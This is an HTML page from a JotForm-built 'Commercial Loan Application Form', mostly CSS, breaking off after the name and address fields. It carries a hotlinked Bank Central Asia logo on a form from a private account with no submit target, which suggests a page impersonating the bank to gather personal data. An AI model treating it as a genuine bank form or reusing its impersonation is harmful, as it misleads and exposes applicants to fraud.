<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en"  class="supernova"><head>
	<meta http-equiv="Content-Language" name="fr"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<link rel="alternate" type="application/json+oembed" href="https://www.jotform.com/oembed/?format=json&amp;url=https%3A%2F%2Fform.jotform.com%2F240227366607557" title="oEmbed Form">
<link rel="alternate" type="text/xml+oembed" href="https://www.jotform.com/oembed/?format=xml&amp;url=https%3A%2F%2Fform.jotform.com%2F240227366607557" title="oEmbed Form">
<meta property="og:title" content="Commercial Loan Application Form" >
<meta property="og:description" content="Please click the link to complete this form." >
<meta name="slack-app-id" content="AHNMASS8M">
<meta name="format-detection" content="telephone=no">
<meta property="og:image" content="https://www.jotform.com/uploads/ehleranita722/form_files/pngwing.com_1_.png" />
<link rel="shortcut icon" href="https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light%402x.png">
<link rel="apple-touch-icon" href="https://cdn.jotfor.ms/assets/img/favicons/favicon-2021-light%402x.png">
<script>
          var favicon = document.querySelector('link[rel="shortcut icon"]');
          window.isDarkMode = (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches);
          if(favicon && window.isDarkMode) {
              favicon.href = favicon.href.replaceAll('favicon-2021-light%402x.png', 'favicon-2021-dark%402x.png');
          }
      </script>
      	
      <link rel="canonical" />
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=1" />
<meta name="HandheldFriendly" content="true" />
<title>Commercial Loan Application Form</title>
<link href="https://cdn01.jotfor.ms/static/formCss.css?3.3.50537" rel="stylesheet" type="text/css" />
<link type="text/css" rel="stylesheet" href="https://cdn02.jotfor.ms/stylebuilder/static/form-common.css?v=5ded9b4
"/>
<link type="text/css" rel="stylesheet" href="https://cdn03.jotfor.ms/css/styles/nova.css?3.3.50537" />
<style type="text/css">@media print{*{-webkit-print-color-adjust: exact !important;color-adjust: exact !important;}.form-section{display:inline!important}.form-pagebreak{display:none!important}.form-section-closed{height:auto!important}.page-section{position:initial!important}}</style>
<link id="custom-font" type="text/css" rel="stylesheet" href="//cdn.jotfor.ms/fonts/?family=Roboto" />
<link type="text/css" rel="stylesheet" href="https://cdn01.jotfor.ms/themes/CSS/566a91c2977cdfcd478b4567.css?v=3.3.50537"/>
<link type="text/css" rel="stylesheet" href="https://cdn02.jotfor.ms/css/styles/payment/payment_feature.css?3.3.50537" />
<link type="text/css" rel="stylesheet" href="https://cdn03.jotfor.ms/stylebuilder/static/donationBox.css?v=3.3.50537">
<style type="text/css">
    .form-label-left{
        width:150px;
    }
    .form-line{
        padding-top:12px;
        padding-bottom:12px;
    }
    .form-label-right{
        width:150px;
    }
    body, html{
        margin:0;
        padding:0;
        background:rgba(255,255,255,0.85);
        overflow-x: hidden;
    }

    .form-all{
        margin:0px auto;
        padding-top:0px;
        width:690px;
        color:#6a4a3c !important;
        font-family:'Roboto';
        font-size:14px;
    }
</style>

<style type="text/css" id="form-designer-style">
    /* Injected CSS Code */
.form-all:after {
  content: "";
  display: table;
  clear: both;
}
.form-all {
  font-family: "Roboto", sans-serif;
}
.form-all {
  width: 690px;
}
.form-label-left,
.form-label-right {
  width: 150px;
}
.form-label {
  white-space: normal;
}

.form-label-left {
  display: inline-block;
  white-space: normal;
  float: left;
  text-align: left;
}
.form-label-right {
  display: inline-block;
  white-space: normal;
  float: left;
  text-align: right;
}
.form-label-top {
  white-space: normal;
  display: block;
  float: none;
  text-align: left;
}
.form-radio-item label:before {
  top: 0;
}
.form-all {
  font-size: 14px;
}
.form-label {
  font-weight: bold;
}
.form-checkbox-item label,
.form-radio-item label {
  font-weight: normal;
}
.supernova {
  background-color: rgba(255, 255, 255, 0.85);
  background-color: #f8f8f8;
}
.supernova body {
  background-color: transparent;
}
@media screen and (min-width: 480px) {
  .supernova .form-all {
    border: 1px solid #dfdfdf;
    box-shadow: 0 3px 9px rgba(0, 0, 0, 0.1);
  }
}
/* | */
/* | */
@media screen and (max-width: 480px) {
  .jotform-form .form-all {
    width: 100%;
  }
}
/* | */
/* | */
@media screen and (min-width: 480px) and (max-width: 767px) {
  .jotform-form .form-all {
    width: 100%;
  }
}
/* | */
/* | */
@media screen and (min-width: 480px) and (max-width: 689px) {
  .jotform-form .form-all {
    width: 100%;
  }
}
/* | */
/* | */
@media screen and (min-width: 768px) {
  .jotform-form {
    padding: 60px 0;
  }
}
/* | */
/* | */
@media screen and (max-width: 689px) {
  .jotform-form .form-all {
    width: 100%;
  }
}
/* | */
.supernova .form-all,
.form-all {
  background-color: rgba(255, 255, 255, 0.85);
  border: 1px solid transparent;
}
.form-header-group {
  border-color: rgba(230, 230, 230, 0.85);
}
.form-matrix-table tr {
  border-color: rgba(230, 230, 230, 0.85);
}
.form-matrix-table tr:nth-child(2n) {
  background-color: rgba(242, 242, 242, 0.85);
}
.form-all {
  color: #6a4a3c;
}
.form-header-group .form-header {
  color: #6a4a3c;
}
.form-header-group .form-subHeader {
  color: #8b614e;
}
.form-sub-label {
  color: #8b614e;
}
.form-label-top,
.form-label-left,
.form-label-right,
.form-html {
  color: #6a4a3c;
}
.form-checkbox-item label,
.form-radio-item label {
  color: #8b614e;
}
.form-line.form-line-active {
  -webkit-transition-property: all;
  -moz-transition-property: all;
  -ms-transition-property: all;
  -o-transition-property: all;
  transition-property: all;
  -webkit-transition-duration: 0.3s;
  -moz-transition-duration: 0.3s;
  -ms-transition-duration: 0.3s;
  -o-transition-duration: 0.3s;
  transition-duration: 0.3s;
  -webkit-transition-timing-function: ease;
  -moz-transition-timing-function: ease;
  -ms-transition-timing-function: ease;
  -o-transition-timing-function: ease;
  transition-timing-function: ease;
  background-color: #ffffe0;
}
/* omer */
.form-radio-item,
.form-checkbox-item {
  padding-bottom: 0px !important;
}
.form-radio-item:last-child,
.form-checkbox-item:last-child {
  padding-bottom: 0;
}
/* omer */
.form-single-column .form-checkbox-item,
.form-single-column .form-radio-item {
  width: 100%;
}
.form-checkbox-item .editor-container div,
.form-radio-item .editor-container div {
  position: relative;
}
.form-checkbox-item .editor-container div:before,
.form-radio-item .editor-container div:before {
  display: inline-block;
  vertical-align: middle;
  box-sizing: border-box;
  left: 0;
  width: 18px;
  height: 18px;
}
.form-radio-item:not(#foo) {
  position: relative;
}
.form-radio-item:not(#foo) .form-radio-other.form-radio {
  display: none !important;
}
.form-radio-item:not(#foo) .form-radio-other-input {
  width: 70%;
}
.form-radio-item:not(#foo) input[type="checkbox"],
.form-radio-item:not(#foo) input[type="radio"] {
  opacity: 0;
  width: 0;
  margin: 0;
  padding: 0;
}
.form-radio-item:not(#foo) .form-radio-other,
.form-radio-item:not(#foo) .form-checkbox-other {
  display: inline-block !important;
}
.form-radio-item:not(#foo) .form-checkbox-other-input,
.form-radio-item:not(#foo) .form-radio-other-input {
  margin: 0;
}
.form-radio-item:not(#foo) label {
  line-height: 24px;
  float: left;
  margin-left: 63px;
}
.form-radio-item:not(#foo) label:before {
  content: '';
  position: absolute;
  display: inline-block;
  vertical-align: baseline;
  margin-right: 4px;
  box-sizing: border-box;
  border-radius: 12px;
  left: 4px;
  width: 43.2px;
  height: 24px;
  cursor: pointer;
  background: #f3f3f3;
  border: 3px solid #dedede;
}
.form-radio-item:not(#foo) label:after {
  content: '';
  position: absolute;
  z-index: 10;
  display: inline-block;
  top: 0px;
  left: 4px;
  width: 24px;
  height: 24px;
  border-radius: 12px;
  border: 3px solid #dedede;
  background: #fff;
  -webkit-transition-property: all;
  -moz-transition-property: all;
  -ms-transition-property: all;
  -o-transition-property: all;
  transition-property: all;
  -webkit-transition-duration: 0.2s;
  -moz-transition-duration: 0.2s;
  -ms-transition-duration: 0.2s;
  -o-transition-duration: 0.2s;
  transition-duration: 0.2s;
  -webkit-transition-timing-function: ease;
  -moz-transition-timing-function: ease;
  -ms-transition-timing-function: ease;
  -o-transition-timing-function: ease;
  transition-timing-function: ease;
  box-sizing: border-box;
}
.form-radio-item:not(#foo) input:checked + label:before {
  background: #0822ff;
  border-color: #0019ed;
}
.form-radio-item:not(#foo) input:checked + label:after {
  border-color: #0019ed;
  left: 22.2px;
}
.form-radio-item:not(#foo) .editor-container div:before {
  width: 43.2px;
  height: 24px;
  content: '';
  border-radius: 12px;
  margin: 0 4px 0 -6px;
  box-sizing: border-box;
  left: 4px;
  cursor: pointer;
  background: #f3f3f3;
  border: 3px solid #dedede;
}
.form-radio-item:not(#foo) .editor-container div:after {
  content: '';
  position: absolute;
  z-index: 10;
  display: inline-block;
  top: 0px;
  left: -6px;
  width: 24px;
  height: 24px;
  box-sizing: border-box;
  border-radius: 12px;
  border: 3px solid #dedede;
  background: #fff;
}
.form-checkbox-item:not(#foo) {
  position: relative;
  max-width: unset;
}
.form-checkbox-item:not(#foo) .form-checkbox-other.form-checkbox {
  display: none !important;
}
.form-checkbox-item:not(#foo) .form-radio-other-input {
  width: 70%;
}
.form-checkbox-item:not(#foo) input[type="checkbox"],
.form-checkbox-item:not(#foo) input[type="radio"] {
  opacity: 0;
  width: 0;
  margin: 0;
  padding: 0;
}
.form-checkbox-item:not(#foo) .form-radio-other,
.form-checkbox-item:not(#foo) .form-checkbox-other {
  display: inline-block !important;
}
.form-checkbox-item:not(#foo) .form-checkbox-other-input,
.form-checkbox-item:not(#foo) .form-radio-other-input {
  margin: 0;
}
.form-checkbox-item:not(#foo) label {
  line-height: 24px;
  float: left;
  margin-left: 63px;
}
.form-checkbox-item:not(#foo) label:before {
  content: '';
  position: absolute;
  display: inline-block;
  vertical-align: baseline;
  margin-right: 4px;
  box-sizing: border-box;
  border-radius: 12px;
  left: 4px;
  width: 43.2px;
  height: 24px;
  cursor: pointer;
  background: #f3f3f3;
  border: 3px solid #dedede;
}
.form-checkbox-item:not(#foo) label:after {
  content: '';
  position: absolute;
  z-index: 10;
  display: inline-block;
  top: 0px;
  left: 4px;
  width: 24px;
  height: 24px;
  border-radius: 12px;
  border: 3px solid #dedede;
  background: #fff;
  -webkit-transition-property: all;
  -moz-transition-property: all;
  -ms-transition-property: all;
  -o-transition-property: all;
  transition-property: all;
  -webkit-transition-duration: 0.2s;
  -moz-transition-duration: 0.2s;
  -ms-transition-duration: 0.2s;
  -o-transition-duration: 0.2s;
  transition-duration: 0.2s;
  -webkit-transition-timing-function: ease;
  -moz-transition-timing-function: ease;
  -ms-transition-timing-function: ease;
  -o-transition-timing-function: ease;
  transition-timing-function: ease;
  box-sizing: border-box;
}
.form-checkbox-item:not(#foo) input:checked + label:before {
  background: #1708ff;
  border-color: #0f00ed;
}
.form-checkbox-item:not(#foo) input:checked + label:after {
  border-color: #0f00ed;
  left: 22.2px;
}
.form-checkbox-item:not(#foo) .editor-container div:before {
  width: 43.2px;
  height: 24px;
  content: '';
  border-radius: 12px;
  margin: 0 4px 0 -6px;
  box-sizing: border-box;
  left: 4px;
  cursor: pointer;
  background: #f3f3f3;
  border: 3px solid #dedede;
}
.form-checkbox-item:not(#foo) .editor-container div:after {
  content: '';
  position: absolute;
  z-index: 10;
  display: inline-block;
  top: 0px;
  left: -6px;
  width: 24px;
  height: 24px;
  box-sizing: border-box;
  border-radius: 12px;
  border: 3px solid #dedede;
  background: #fff;
}
.supernova {
  height: 100%;
  background-repeat: no-repeat;
  background-attachment: scroll;
  background-position: center top;
  background-attachment: fixed;
  background-size: auto;
  background-size: cover;
}
.supernova {
  background-image: none;
  background-image: url("https://www.jotform.com/uploads/wliyam/form_files/blue-glass-paneled-buildings-under-clear-blue-sky-2078774.5df365b5da26f0.33913136.jpg");
}
#stage {
  background-image: none;
  background-image: url("https://www.jotform.com/uploads/wliyam/form_files/blue-glass-paneled-buildings-under-clear-blue-sky-2078774.5df365b5da26f0.33913136.jpg");
}
/* | */
.form-all {
  background-repeat: no-repeat;
  background-attachment: scroll;
  background-position: center top;
  background-size: cover;
}
.form-header-group {
  background-repeat: no-repeat;
  background-attachment: scroll;
  background-position: center top;
}
.form-line {
  margin-top: 12px;
  margin-bottom: 12px;
}
.form-line {
  padding: 12px 36px;
}
.form-all .form-textbox,
.form-all .form-radio-other-input,
.form-all .form-checkbox-other-input,
.form-all .form-captcha input,
.form-all .form-spinner input,
.form-all .form-pagebreak-back,
.form-all .form-pagebreak-next,
.form-all .qq-upload-button,
.form-all .form-error-message {
  border-radius: 6px;
}
.form-all .form-sub-label {
  margin-left: 3px;
}
.form-all .form-textarea {
  border-radius: 6px;
}
.form-all {
  border-radius: 20px;
}
.form-section:first-child {
  border-radius: 20px 20px 0 0;
}
.form-section:last-child {
  border-radius: 0 0 20px 20px;
}
.qq-upload-button,
.submit-button,
.form-submit-reset,
.form-submit-print {
  font-size: 1em;
  padding: 9px 15px;
  font-size: 14px;
  font-weight: normal;
  font-family: inherit;
}
.submit-button {
  font-family: "Roboto", sans-serif;
}
.form-pagebreak-back,
.form-pagebreak-next {
  font-size: 1em;
  padding: 9px 15px;
  font-size: 14px;
  font-weight: normal;
}
h2.form-header {
  line-height: 1.618em;
  font-size: 1.714em;
}
h2 ~ .form-subHeader {
  line-height: 1.5em;
  font-size: 1.071em;
}
.form-header-group {
  text-align: left;
}
.form-captcha input,
.form-spinner input,
.form-error-message {
  padding: 4px 3px 2px 3px;
}
.form-section {
  padding: 0px 0px 0px 0px;
}
.form-header-group {
  margin: 12px 36px 12px 36px;
}
.form-header-group {
  padding: 24px 0px 24px 0px;
}
.form-textbox,
.form-textarea {
  border-style: ridge;
  padding: 4px 3px 2px 3px;
}
.form-textbox,
.form-textarea,
.form-radio-other-input,
.form-checkbox-other-input,
.form-captcha input,
.form-spinner input {
  background-color: #ffffff;
}
.form-textbox {
  height: 32px;
}
.form-textbox,
.form-textarea {
  width: 100%;
  max-width: 466px;
  box-sizing: border-box;
}
[data-type="control_textbox"] .form-input,
[data-type="control_textarea"] .form-input,
[data-type="control_fullname"] .form-input,
[data-type="control_phone"] .form-input,
[data-type="control_datetime"] .form-input,
[data-type="control_address"] .form-input,
[data-type="control_email"] .form-input,
[data-type="control_passwordbox"] .form-input,
[data-type="control_autocomp"] .form-input,
[data-type="control_textbox"] .form-input-wide,
[data-type="control_textarea"] .form-input-wide,
[data-type="control_fullname"] .form-input-wide,
[data-type="control_phone"] .form-input-wide,
[data-type="control_datetime"] .form-input-wide,
[data-type="control_address"] .form-input-wide,
[data-type="control_email"] .form-input-wide,
[data-type="control_passwordbox"] .form-input-wide,
[data-type="control_autocomp"] .form-input-wide {
  width: 100%;
  max-width: 466px;
}
[data-type="control_fullname"] .form-sub-label-container {
  box-sizing: border-box;
  width: 48%;
  margin-right: 0;
  float: left;
}
[data-type="control_fullname"] .form-sub-label-container:first-child {
  margin-right: 4%;
}
[data-type="control_phone"] .form-sub-label-container {
  width: 62.5%;
  margin-left: 2.5%;
  margin-right: 0;
  float: left;
  position: relative;
}
[data-type="control_phone"] .form-sub-label-container:first-child {
  width: 32.5%;
  margin-right: 2.5%;
  margin-left: 0;
}
[data-type="control_phone"] .form-sub-label-container:first-child [data-component=areaCode] {
  width: 93%;
  float: left;
}
[data-type="control_phone"] .form-sub-label-container:first-child [data-component=areaCode] ~ .form-sub-label {
  display: inline-block;
}
[data-type="control_phone"] .form-sub-label-container:first-child .phone-separate {
  position: absolute;
  top: 0;
  right: -16%;
  width: 24%;
  text-align: center;
  text-indent: -4px;
}
[data-type="control_phone"] .form-sub-label-container .date-separate {
  visibility: hidden;
}
.form-matrix-table {
  width: 100%;
  max-width: 466px;
}
.form-address-table {
  width: 100%;
  max-width: 466px;
}
.form-address-table td .form-dropdown {
  width: 100%;
}
.form-address-table td .form-sub-label-container {
  width: 96%;
}
.form-address-table td:last-child .form-sub-label-container {
  margin-left: 4%;
}
.form-address-table td[colspan="2"] .form-sub-label-container {
  width: 100%;
  margin: 0;
}
.form-matrix-row-headers,
.form-matrix-column-headers,
.form-matrix-values {
  padding: 4px;
}
[data-type="control_dropdown"] .form-input,
[data-type="control_dropdown"] .form-input-wide {
  width: 150px;
}
li[data-type="control_image"] div {
  text-align: left;
}
li[data-type="control_image"] img {
  border: none;
  border-width: 0px !important;
  border-style: solid !important;
  border-color: false !important;
}
.form-line-column {
  width: auto;
}
.form-line-error {
  overflow: hidden;
  -webkit-transition-property: none;
  -moz-transition-property: none;
  -ms-transition-property: none;
  -o-transition-property: none;
  transition-property: none;
  -webkit-transition-duration: 0.3s;
  -moz-transition-duration: 0.3s;
  -ms-transition-duration: 0.3s;
  -o-transition-duration: 0.3s;
  transition-duration: 0.3s;
  -webkit-transition-timing-function: ease;
  -moz-transition-timing-function: ease;
  -ms-transition-timing-function: ease;
  -o-transition-timing-function: ease;
  transition-timing-function: ease;
  background-color: #fff4f4;
}
.form-line-error .form-error-message {
  background-color: #ff3200;
  clear: both;
  float: none;
}
.form-line-error .form-error-message .form-error-arrow {
  border-bottom-color: #ff3200;
}
.form-line-error input:not(#coupon-input),
.form-line-error textarea,
.form-line-error .form-validation-error {
  border: 1px solid #ff3200;
  box-shadow: 0 0 3px #ff3200;
}
[data-type="control_clear"] {
  display: none;
}
/* | */
@media screen and (max-width: 480px), screen and (max-device-width: 767px) and (orientation: portrait), screen and (max-device-width: 415px) and (orientation: landscape) {
  .testOne {
    letter-spacing: 0;
  }
  .form-all {
    border: 0;
    max-width: initial;
  }
  .form-sub-label-container {
    width: 100%;
    margin: 0;
    margin-right: 0;
    float: left;
    box-sizing: border-box;
  }
  span.form-sub-label-container + span.form-sub-label-container {
    margin-right: 0;
  }
  .form-sub-label {
    white-space: normal;
  }
  .form-address-table td,
  .form-address-table th {
    padding: 0 1px 10px;
  }
  .form-submit-button,
  .form-submit-print,
  .form-submit-reset {
    width: 100%;
    margin-left: 0!important;
  }
  div[id*=at_] {
    font-size: 14px;
    font-weight: 700;
    height: 8px;
    margin-top: 6px;
  }
  .showAutoCalendar {
    width: 20px;
  }
  img.form-image {
    max-width: 100%;
    height: auto;
  }
  .form-matrix-row-headers {
    width: 100%;
    word-break: break-all;
    min-width: 80px;
  }
  .form-collapse-table,
  .form-header-group {
    margin: 0;
  }
  .form-collapse-table {
    height: 100%;
    display: inline-block;
    width: 100%;
  }
  .form-collapse-hidden {
    display: none !important;
  }
  .form-input {
    width: 100%;
  }
  .form-label {
    width: 100% !important;
  }
  .form-label-left,
  .form-label-right {
    display: block;
    float: none;
    text-align: left;
    width: auto!important;
  }
  .form-line,
  .form-line.form-line-column {
    padding: 2% 5%;
    box-sizing: border-box;
  }
  input[type=text],
  input[type=email],
  input[type=tel],
  textarea {
    width: 100%;
    box-sizing: border-box;
    max-width: initial !important;
  }
  .form-radio-other-input,
  .form-checkbox-other-input {
    max-width: 55% !important;
  }
  .form-dropdown,
  .form-textarea,
  .form-textbox {
    width: 100%!important;
    box-sizing: border-box;
  }
  .form-input,
  .form-input-wide,
  .form-textarea,
  .form-textbox,
  .form-dropdown {
    max-width: initial!important;
  }
  .form-checkbox-item:not(#foo),
  .form-radio-item:not(#foo) {
    width: 100%;
  }
  .form-address-city,
  .form-address-line,
  .form-address-postal,
  .form-address-state,
  .form-address-table,
  .form-address-table .form-sub-label-container,
  .form-address-table select,
  .form-input {
    width: 100%;
  }
  div.form-header-group {
    padding: 24px 0px !important;
    margin: 0 12px 2% !important;
    margin-left: 5%!important;
    margin-right: 5%!important;
    box-sizing: border-box;
  }
  div.form-header-group.hasImage img {
    max-width: 100%;
  }
  [data-type="control_button"] {
    margin-bottom: 0 !important;
  }
  [data-type=control_fullname] .form-sub-label-container {
    width: 48%;
  }
  [data-type=control_fullname] .form-sub-label-container:first-child {
    margin-right: 4%;
  }
  [data-type=control_phone] .form-sub-label-container {
    width: 65%;
    margin-right: 0;
    margin-left: 0;
    float: left;
  }
  [data-type=control_phone] .form-sub-label-container:first-child {
    width: 31%;
    margin-right: 4%;
  }
  [data-type=control_datetime] .allowTime-container {
    width: 100%;
  }
  [data-type=control_datetime] .allowTime-container .form-sub-label-container {
    width: 24%!important;
    margin-left: 6%;
    margin-right: 0;
  }
  [data-type=control_datetime] .allowTime-container .form-sub-label-container:first-child {
    margin-left: 0;
  }
  [data-type=control_datetime] span + span + span > span:first-child {
    display: block;
    width: 100% !important;
  }
  [data-type=control_birthdate] .form-sub-label-container,
  [data-type=control_time] .form-sub-label-container {
    width: 27.3%!important;
    margin-right: 6% !important;
  }
  [data-type=control_time] .form-sub-label-container:last-child {
    width: 33.3%!important;
    margin-right: 0 !important;
  }
  .form-pagebreak-back-container,
  .form-pagebreak-next-container {
    min-height: 1px;
    width: 50% !important;
  }
  .form-pagebreak-back,
  .form-pagebreak-next,
  .form-product-item.hover-product-item {
    width: 100%;
  }
  .form-pagebreak-back-container {
    padding: 0;
    text-align: right;
  }
  .form-pagebreak-next-container {
    padding: 0;
    text-align: left;
  }
  .form-pagebreak {
    margin: 0 auto;
  }
  .form-buttons-wrapper {
    margin: 0!important;
    margin-left: 0!important;
  }
  .form-buttons-wrapper button {
    width: 100%;
  }
  .form-buttons-wrapper .form-submit-print {
    margin: 0 !important;
  }
  table {
    width: 100%!important;
    max-width: initial!important;
  }
  table td + td {
    padding-left: 3%;
  }
  .form-checkbox-item,
  .form-radio-item {
    white-space: normal!important;
  }
  .form-checkbox-item input,
  .form-radio-item input {
    width: auto;
  }
  .form-collapse-table {
    margin: 0 5%;
    display: block;
    zoom: 1;
    width: auto;
  }
  .form-collapse-table:before,
  .form-collapse-table:after {
    display: table;
    content: '';
    line-height: 0;
  }
  .form-collapse-table:after {
    clear: both;
  }
  .fb-like-box {
    width: 98% !important;
  }
  .form-error-message {
    clear: both;
    bottom: -10px;
  }
  .date-separate,
  .phone-separate {
    display: none;
  }
  .custom-field-frame,
  .direct-embed-widgets,
  .signature-pad-wrapper {
    width: 100% !important;
  }
}
/* | */

/*PREFERENCES STYLE*/
    .form-all {
      font-family: Roboto, sans-serif;
    }
  
    .form-label.form-label-auto {
      
    display: inline-block;
    float: left;
    text-align: right;
  
    }
  
    .form-line {
      margin-top: 12px;
      margin-bottom: 12px;
    }
  
    .form-all {
      max-width: 690px;
      width: 100%;
    }
  
    .form-label.form-label-left,
    .form-label.form-label-right,
    .form-label.form-label-left.form-label-auto,
    .form-label.form-label-right.form-label-auto {
      width: 150px;
    }
  
    .form-all {
      font-size: 14px
    }
  
    .supernova .form-all, .form-all {
      background-color: rgba(255,255,255,0.85);
    }
  
    .form-all {
      color: #6a4a3c;
    }
    .form-header-group .form-header {
      color: #6a4a3c;
    }
    .form-header-group .form-subHeader {
      color: #6a4a3c;
    }
    .form-label-top,
    .form-label-left,
    .form-label-right,
    .form-html,
    .form-checkbox-item label,
    .form-radio-item label,
    span.FITB .qb-checkbox-label,
    span.FITB .qb-radiobox-label,
    span.FITB .form-radio label,
    span.FITB .form-checkbox label,
    [data-blotid][data-type=checkbox] [data-labelid],
    [data-blotid][data-type=radiobox] [data-labelid],
    span.FITB-inptCont[data-type=checkbox] label,
    span.FITB-inptCont[data-type=radiobox] label {
      color: #6a4a3c;
    }
    .form-sub-label {
      color: #846456;
    }
  
  .supernova {
    background-color: rgb(248, 248, 248);
  }
  .supernova body {
    background: transparent;
  }
  
    .form-textbox,
    .form-textarea,
    .form-dropdown,
    .form-radio-other-input,
    .form-checkbox-other-input,
    .form-captcha input,
    .form-spinner input {
      background-color: #fff;
    }
  
    
    .supernova {
      background-repeat: no-repeat;
      background-size:cover;
      background-attachment: fixed;
      background-position: center top;
    }

    .supernova, #stage {
      background-image: url("https://www.jotform.com/uploads/ehleranita722/form_files/blue-glass-paneled-buildings-under-clear-blue-sky-2078774.5df365b5da26f0.33913136.65b135cdb46131.08003425.jpg");
    }
      .form-all {
        background-image: none;
      }
    /*PREFERENCES STYLE*//*__INSPECT_SEPERATOR__*/
.form-page-cover-image {

}

.form-label.form-label-auto {
        
      display: block;
      float: none;
      text-align: left;
      width: 100%;
    
      }
    /* Injected CSS Code */
</style>

<!--[if lt IE 9]>
<script src="https://cdn01.jotfor.ms/js/vendor/flashcanvas.js?v=3.3.50537" type="text/javascript"></script>
<![endif]-->

<script src="js/signature.js"></script>



<script>


</script>
</head>
<body>
<form class="jotform-form" id="form" method="post" enctype="multipart/form-data" name="form_240227366607557" id="240227366607557" accept-charset="utf-8" autocomplete="on">
  <div id="formCoverLogo" style="margin-bottom:32px" class="form-cover-wrapper form-has-cover form-page-cover-image-align-center">
    <div class="form-page-cover-image-wrapper" style="max-width:690px">
    		
    	<img src="https://www.cdnlogo.com/logos/b/32/bca-bank-central-asia.svg" class="form-page-cover-image" width="160" aria-label="Form Logo" style="aspect-ratio:200/150" /> 
    	
    	</div>
  </div>
  <div role="main" class="form-all">
    <link type="text/css" rel="stylesheet" media="all" href="https://cdn.jotfor.ms/wizards/languageWizard/custom-dropdown/css/lang-dd.css?3.3.50537" />
    <div class="cont">
    	
      <div class="language-dd" id="langDd" style="display:none">
        <div class="dd-placeholder lang-emp">Language</div>
        <ul class="lang-list dn" id="langList">
          <li data-lang="en" class="en">English (US)</li>
          <li data-lang="pl" class="pl">Polski</li>
        </ul>
      </div>
    </div>
    <ul class="form-section page-section">
      <li id="cid_1" class="form-input-wide" data-type="control_head">
        <div class="form-header-group  header-default">
          <div class="header-text httal htvat">
            <h2 id="header_1" class="form-header" data-component="header">Commercial Loan Application Form</h2>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_text" id="id_4">
        <div id="cid_4" class="form-input-wide">
          <div id="text_4" class="form-html" data-component="text" tabindex="0">
            <div style="width:100%;background-color:#0e1876;color:#fff;padding:4px 4px;">
              <p><strong id="bh1">Applicant Information</strong></p>
            </div>
          </div>
        </div>
      </li>
      <li class="form-line" data-type="control_fullname" id="id_45"><label class="form-label form-label-right form-label-auto" id="label_45" for="first_45" aria-hidden="false"> Name </label>
        <div id="cid_45" class="form-input">
          <div data-wrapper-react="true"><span class="form-sub-label-container" style="vertical-align:top" data-input-type="first"><input type="text" id="first_45" name="q45_name45[first]" class="form-textbox validate" data-defaultvalue="" autoComplete="section-input_45 given-name" size="10" data-component="first" aria-labelledby="label_45 sublabel_45_first" value="" /><label class="form-sub-label" for="first_45" id="sublabel_45_first" style="min-height:13px">First Name</label></span><span class="form-sub-label-container" style="vertical-align:top" data-input-type="last"><input type="text" id="last_45" name="q45_name45[last]" class="form-textbox validate" data-defaultvalue="" autoComplete="section-input_45 family-name" size="15" data-component="last" aria-labelledby="label_45 sublabel_45_last" value="" /><label class="form-sub-label" for="last_45" id="sublabel_45_last" style="min-height:13px">Last Name</label></span></div>
        </div>
      </li>
      <li class="form-line form-line-column form-col-1 form-line-column-clear always-hidden" data-type="control_radio" id="id_6"><label class="form-label form-label-right form-label-auto" id="label_6" aria-hidden="false"> Applicant is </label>
        <div id="cid_6" class="form-input always-hidden">
          <div class="form-single-column" role="group" aria-labelledby="label_6" data-component="radio"><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_6" class="form-radio" id="input_6_0" name="q6_applicantIs" value="Borrower" /><label id="label_input_6_0" for="input_6_0">Borrower</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_6" class="form-radio" id="input_6_1" name="q6_applicantIs" value="Consigner" /><label id="label_input_6_1" for="input_6_1">Consigner</label></span><span class="form-radio-item" style="clear:left"><span class="dragger-item"></span><input type="radio" aria-describedby="label_6" class="form-radio" id="input_6_2" name="q6_applicantIs" value="Guarantor" /><label id="label_input_6_2" for="input_6_2">Guarantor</label></span><span class="form-radio-item" style="clear:left"><input type="radio" class="form-radio-other form-radio" name="q6_applicantIs" id="other_6" value="other" tabindex="0" aria-label="Other" /><label id="label_other_6" style="text-indent:0" for="other_6"><span class="jfHiddenTextLabel">Other</span> </label><input type="text" class="form-radio-other-input form-textbox" name="q6_applicantIs[other]" data-otherhint="Other" size="15" id="input_6" placeholder="Other" /><br /></span></div>
        </div>
      </li>
      <li class="form-line jf-required" data-type="control_address" id="id_12"><label class="form-label form-label-right form-label-auto" id="label_12" for="input_12_addr_line1" aria-hidden="false"> Address<span class="form-required">*</span> </label>
        <div id="cid_12" class="form-input jf-required">
          <div summary="" class="form-address-table jsTest-addressField">
            <div class="form-address-line-wrapper jsTest-address-line-wrapperField"><span class="form-address-line form-address-street-line jsTest-address-lineField"><span class="form-sub-label-container" style="vertical-align:top"><input type="text" id="input_12_addr_line1" name="q12_address[addr_line1]" class="form-textbox validate form-address-line" data-defaultvalue="" autoComplete="section-input_12 address-line1" data-component="address_line_1" aria-labelledby="label_12 sublabel_12_addr_line1" required="" value="" /><label class="form-sub-label" for="input_12_addr_line1" id="sublabel_12_addr_line1" style="min-height:13px">Street Address</label></span></span></div>
            <div class="form-address-line-wrapper jsTest-address-line-wrapperField"><span class="form-address-line form-address-street-line jsTest-address-lineField"><span class="form-sub-label-container" style="vertical-align:top"><input type="text" id="input_12_addr_line2" name="q12_address[addr_line2]" class="form-textbox form-address-line" data-defaultvalue="" autoComplete="section-input_12 address-line2" data-component="address_line_2" aria-labelledby="label_12 sublabel_12_addr_line2" required="" value="" /><label class="form-sub-label" for="input_12_addr_line2" id="sublabel_12_addr_line2" style="min-height:13px">Street Address Line 2</label></span></span></div>
